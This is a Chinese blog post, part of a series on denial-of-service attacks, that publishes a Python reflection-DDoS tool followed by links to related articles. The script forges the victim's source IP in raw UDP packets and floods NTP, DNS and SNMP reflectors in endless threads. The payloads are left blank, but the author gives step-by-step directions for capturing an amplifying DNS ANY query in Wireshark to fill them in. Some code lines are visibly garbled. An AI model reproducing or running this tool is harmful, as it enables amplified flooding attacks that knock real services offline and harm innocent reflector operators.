浅谈拒绝服务攻击的原理与防御(3):反射DDOS攻击利用代码

最新推荐文章于 2023-12-08 17:41:02 发布
最新推荐文章于 2023-12-08 17:41:02 发布
阅读量651 收藏 5
点赞数
分类专栏: 黑客攻防技术

0×01 前言

之前发了一篇关于反射DDOS攻击原理以及反射资源扫描的文章,本来今天的这个应该并到那篇文章里,共称为反射DDOS攻击扫描与利用,但是我怕这样做会教坏小孩子,但是我想了一天以后我觉得我还是发出来吧,毕竟我写的也不好,没必要藏着掖着的,我还会把payload去掉,让大家自己填写,这就不算是我搞破坏了。废话不多说了,赶紧发完了。

0×02 代码的使用方法

首先,我这是在linux环境下写的,开始我用windows开发的,但是总是不成功,调用python的原始套接字伪造源IP地址总是不能发出去,后来我换到linux上就好了(kali),我并没有调用第三方的库,只要是linux+python就可以执行,在执行之前需要先在利用代码的同文件夹中建一个ipaddress.txt文件 ,作为反射攻击的反射资源地址池,多点少点都行,但是记住最后一行不要空着,不然程序报错,格式就如同下图(IP地址,端口号):

利用代码就是如下这些了。。。。

   
   
  1. #!/usr/bin/python
  2. #-*-coding:utf-8-*-
  3.  
  4. import socket
  5. import struct
  6. import random
  7. import threading
  8.  
  9. class myThread (threading.Thread):  
  10.     def __init__(self,srcip,srcport):
  11.         threading.Thread.__init__(self)         
  12.         self.srcip = srcip
  13.         self.srcport =srcport
  14.                 
  15.     def run(self):                    
  16.         re_att(self.srcip,self.srcport)
  17.  
  18. def checksum(data):
  19.     s = 0
  20.     n = len(data) % 2
  21.     for i in range(0, len(data)-n, 2):
  22.         s+= ord(data[i]) + (ord(data[i+1]) << 8)
  23.     if n:
  24.         s+= ord(data[i+1])
  25.     while (>> 16):
  26.         s = (& 0xFFFF) + (>> 16)
  27.     s = ~& 0xffff
  28.     return s
  29.  
  30. def IP(source,destination,udplen):
  31.         version = 4
  32.         ihl = 5
  33.         tos = 0
  34.         tl = 20+udplen
  35.         ip_id = random.randint(1,65530)
  36.         flags = 0 
  37.         offset = 0
  38.         ttl = 128
  39.         protocol =17
  40.         check =0
  41.         source = socket.inet_aton(source)
  42.         destination = socket.inet_aton(destination)
  43.  
  44.         ver_ihl = (version << 4)+ihl
  45.         flags_offset = (flags << 13)+offset
  46.         ip_header = struct.pack("!BBHHHBBH4s4s",
  47.                     ver_ihl,
  48.                     tos,
  49.                     tl,
  50.                     ip_id,
  51.                     flags_offset,
  52.                     ttl,
  53.                     protocol,
  54.                     check,
  55.                     source,
  56.                     destination)
  57.         check=checksum(ip_header)
  58.         ip_header = struct.pack("!BBHHHBBH4s4s",
  59.                     ver_ihl,
  60.                     tos,
  61.                     tl,
  62.                     ip_id,
  63.                     flags_offset,
  64.                     ttl,
  65.                     protocol,
  66.                     socket.htons(check),
  67.                     source,
  68.                     destination)  
  69.         return ip_header
  70.  
  71. def udp(sp,dp,datalen):
  72.         srcport=sp
  73.         dstport=dp
  74.         udplen=8+datalen
  75.         udp_checksum=0
  76.         udp_header = struct.pack("!HHHH",srcport,dstport,udplen,udp_checksum)
  77.         return udp_header
  78.  
  79.  
  80. def re_att(srcip,srcport):
  81.         NTP_data=#payload需要你们自己写啊,就是写\x0a 这种十六进制的就可以,不会写的话叫你们个简单方法,去whireshark上抓一个包
  82.         DNS_data=#payload需要你们自己写啊
  83.         SNMP_data=#payload需要你们自己写啊
  84.  
  85.         n=len(ipaddr)-1
  86.         while 1:
  87.                 i=random.randint(0,n)
  88.                 ip_port=ipaddr[i]
  89.                 dstip=ip_port[0]
  90.                 dstport=int(ip_port[1])
  91.                 if dstport==123:
  92.                         data=NTP_data
  93.                 elif dstport==53:
  94.                         data=DNS_data
  95.                 elif dstport==161:
  96.                         data=SNMP_data
  97.                 else:
  98.                         print 'dest port error!'
  99.                 datalen=len(data)
  100.                 udp_header=udp(srcport,dstport,datalen)
  101.                 ip_header=IP(srcip,dstip,len(udp_header)+datalen)
  102.                 ip_packet=ip_header+udp_header+data
  103.                 s.sendto(ip_packet,(dstip,dstport))
  104.  
  105. proto_udp=17
  106. proto_tcp=6
  107. = socket.socket(socket.AF_INET,socket.SOCK_RAW,17)
  108. s.setsockopt(socket.IPPROTO_IP,socket.IP_HDRINCL,1)
  109. ipaddr=[]
  110. = open("ipaddress.txt","r")
  111. lines=f.readlines()
  112. for line in lines:
  113.         line=line.strip('\r\n')
  114.         l=line.split(',')
  115.         ipaddr.append(l)
  116.  
  117. srcip=raw_input('attack IP:')
  118. srcport=int(input('attack PORT:'))
  119. threads=int(input("线程数threads:"))
  120.  
  121. threads_name=[]
  122. need=(srcip,srcport)        
  123. for i in range(threads):
  124.         threads_name.append('teread'+str(i))
  125.  
  126. for i in range(threads):        
  127.         threads_name[i]=myThread(srcip,srcport)
  128.  
  129. for i in range(threads):
  130.         threads_name[i].start()
  131.  
  132.  
  133. #这个攻击没有结束,想停就直接关了终端就可以了
  134.  
  135. #这个脚本支持多线程,但是要量力而行,我在虚拟机中10线程就有点卡了

这个工具没带payload,但是我可以教大家一个简单的写payload的方法,就是用whireshark抓包

第一步,打开kali whireshark抓包,然后开终端,用dig工具

看,这就能抓到一个DNS的请求和回复包了。这里用的是ANY,请求80字节回复486字节,放大了6倍

第二步,点开请求包(就是80字节那个,别点开错了),选中DNS部分,然后复制,为hex转储

第三步,打开个记事本,把刚才的粘贴进去,这不就是十六进制的payload了吗,把前面的0000那些删掉,再把这些字符以‘\xdf’+’\xdb’+…..这种形式连起来就可以了

第四步,剩下的就自己去领悟吧,别的payload道理差不多,有能力就自己写,想简单点就去复制一下也可以,我可没教你们什么,其他的都是你们自己领悟出来的。。。。。。


killcoco
关注
专栏目录
DDoS攻击防御:从原理到实践
02-24
出于打击报复、敲诈勒索、政治需要等各种原因,加上攻击成本越来越低、效果特别明显等趋势,DDoS攻击已经演变成全球性的网络安全威胁。根据卡巴斯基2016Q3的调查报告,DDoS攻击造成61%的公司无法访问其关键业务信息...
浅谈拒绝服务攻击原理防御(2):反射DDOS
killcoco的小窝
04-23 1415
0×01 前言 今天我就不多说废话了直接来干货。 目前来说流量反射DDOS攻击都是以UDP为载体的,毕竟TCP的三次握手就让伪造源地址反射大流量变得不现实(tcp反射ACK倒是还行- -!) 下面来看看一般能用于反射放大的协议以及放大倍数吧 现在TFTP也被利用来进行DDOS反射了,据说放大倍数也很可观,根据表中显示看来NTP放大倍数最高,不过NTP服务器不多,而
【网络攻防原理与技术】第5章:拒绝服务攻击
Godam
06-06 4861
拒绝服务攻击(DoS Denial of Service), 通过消耗⽹络带宽或者系统资源,使得⽹络或者系统不堪负荷,以⾄于瘫痪⽽停⽌提供正常的⽹络服务或者⽹络服务质量显著下降,或者通过更改系统配置使得系统⽆法正常⼯作,大多数情况下,拒绝服务攻击指的是前者。DDoS指多个攻击者同时向⼀个多个⽬标发起拒绝服务攻击拒绝服务攻击的分类: (1)按攻击目标分类(2)按攻击方式分类(3)按受害者类分类(4)按攻击是否直接针对受害者分类(5)属性分类法(6)舞厅分类法(7)按攻击机制分类利⽤协议本身或者软件的漏洞,
NTP攻击
qq_73992463的博客
11-02 1047
NTP(Network Time Protocol)攻击是一种利用网络时间协议进行攻击的方式,旨在通过发送大量的NTP请求来超载目标服务器或网络,从而导致服务不可用或网络拥塞。我们将全面介绍NTP攻击,包括其定义、攻击方式、攻击架构、防护措施以及与其他攻击方式相比的优势和缺点。
浅谈拒绝服务攻击原理防御(5):NTP反射攻击复现
killcoco的小窝
04-25 2793
0×01 故事起因 系列回顾 前两天以为网友stream(年龄、性别不详)私信我说他在阿里云上的服务器被NTP攻击了,流量超过10G,希望我帮忙一起分析一下,复现一下攻击。我这当代雷锋当然非常乐意了,于是我就和stream联系(勾搭)上了,今天我就详细讲一下我们一起复现NTP反射攻击的过程。 0×02 分析攻击数据 stream大兄弟把当时抓到的包发给了我,数据包不大只有3
NTP反射放大攻击漏洞
最新发布
my的博客
12-08 1939
基于UDP协议的NTP(网络时间协议):使网络中各个计算机时间同步的一种协议用途:把计算机时钟调节到世界调节时UDP。
NTP协议实现
热门推荐
黄仁军的专栏
09-28 1万+
本文出处: http://www.eefocus.com/html/10-04/94667s.shtml 10.4 实验内容 ——NTP协议实现 1.实验目的      通过实现NTP协议的练习,进一步掌握Linux网络编程,并且提高协议的分析与实现能力,为参与完成综合性
浅谈利用JavaScript进行的DDoS攻击原理防御
10-24
DDoS攻击原理防御知识概述: DDoS攻击全称为分布式拒绝服务攻击,是一种通过向目标发送大量请求从而导致服务过载、无法响应合法用户请求的攻击方式。这种攻击通常利用大量的僵尸网络发起。利用JavaScript进行的...
网络攻击
m0_38085573的博客
05-25 369
CC攻击:CC = Challenge Collapsar,意为“挑战黑洞”,其前身名为Fatboy攻击,是利用不断对网站发送连接请求致使形成拒绝服务的目的。业界赋予这种攻击名称为CC(Challenge Collapsar,挑战黑洞),是由于在DDOS攻击发展前期,绝大部分都能被业界知名的“黑洞”(Collapsar)抗拒绝服务攻击系统所防护,于是在黑客们研究出一种新的针对http的DDOS攻击后,即命名Challenge Collapsar,声称黑洞设备无法防御,后来大家就延用CC这个名称至今。有趣的
DOS拒绝服务攻击代码
10-18
DOS拒绝服务攻击代码,仅供学习使用。
大话拒绝服务攻击:DoS、DDoS、LDoS——“直男、舔狗和渣男”
裕东方的博客
02-13 7754
目录 前排提醒 本文的基本假设 一、拒绝服务(DoS)——“直男” 二、分布式拒绝服务(DDoS)——“舔狗” 三、慢速拒绝服务(LDoS)——“渣男” 总结 References 前排提醒 尽管这篇文章有一个非常不正经的标题,但不妨碍它成为一篇硬核的科普文章(手动狗头) Abstract - 本文主要介绍了拒绝服务攻击的基本种类、原理和知识,列举了常见的...
ddos攻击教程:攻击原理防御方法解析
ban0203的专栏
03-13 1198
<br />DoS攻击DDoS攻击和DRDoS攻击相信大家已经早有耳闻了吧!DoS是Denial of Service的简写就是拒绝服务,而DDoS就是Distributed Denial of Service的简写就是分布式拒绝服务,而DRDoS就是Distributed Reflection Denial of Service的简写,这是分布反射拒绝服务的意思。<br /><br />不过这3中攻击方法最厉害的还是DDoS,那个DRDoS攻击虽然是新近出的一种攻击方法,但它只是DDoS攻击的变形,它
Ping of Death攻击
duowei10345677w的博客
04-22 1277
Ping of Death攻击
【渗透测试笔记】之【拒绝服务攻击
AA8j的博客
08-24 817
实验环境 防火墙配置 在之前的基础上将TCP/UDP改为经允许UDP: 内网Linux配置 安装dns2tcp(需要更改防火墙配置允许上网) apt-get install dns2tcp
【python--教程】使用Raw_socket构建一个数据包捕捉器
qq_43017750的博客
09-15 1275
前言 实际上网络并没有我们想想的那么神秘,本篇教程希望能够帮助各位学习socket编程的同学明白数据包的构成。 博主先讲以下数据包的结构 |--------ip头---------|----------tcp头---------|-----------data---------| |-------20字节------|---------20字节--------|------剩余的字节----| 比...
linux 反射拒绝服务,浅谈拒绝服务攻击原理防御(2) :反射DDOS
weixin_33574009的博客
05-09 241
原标题:浅谈拒绝服务攻击原理防御(2) :反射DDOS*本文原创作者:黑戈爾,本文属FreeBuf原创奖励计划,未经许可禁止转载0×01 前言前几天提交了一篇关于DDOS攻击的文章到今天下午才审核通过发表出来,所以晚上闲来无事在接着写下面的内容,今天我就不多说废话了直接来干货。目前来说流量反射DDOS攻击都是以UDP为载体的,毕竟TCP的三次握手就让伪造源地址反射大流量变得不现实(tcp反...
浅谈基于 NTP 的反射和放大攻击
weixin_34232617的博客
02-14 650
最近一段时间 DDoS 攻击事件让基于 NTP 的 DDoS 攻击变得很火热,先看看下面的信息感受下: “It was a very large DDoS targeting a CloudFlare customer,” Matthew Prince, CEO of Cloudflare told SecurityWeek. “We're still gathering the log d...
NTP反射放大攻击(一)知识点扫盲
qq_32350719的博客
03-19 3082
NTP反射放大攻击知识点扫盲 什么是NTP服务 NTP是网络时间协议(Network Time Protocol),它是用来同步网络中各个计算机的时间的协议 在计算机的世界里,时间非常地重要,例如对于火箭发射这种科研活动,对时间的统一性和准确性要求就非常地高,是按照A这台计算机的时间,还是按照B这台计算机的时间?NTP就是用来解决这个问题的,NTP(Network Time Protocol,网络...
网络攻击防御技术:深度探索DDoS拒绝服务攻击
"《网络攻击防御技术实验教程》由张玉清、陈深龙、杨彬编写,是针对信息安全专业学生和爱好者的教材,详细介绍了各种网络攻击防御技术,包括分布式拒绝服务(DDoS)攻击。" 分布式拒绝服务(DDoS)攻击是一种...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值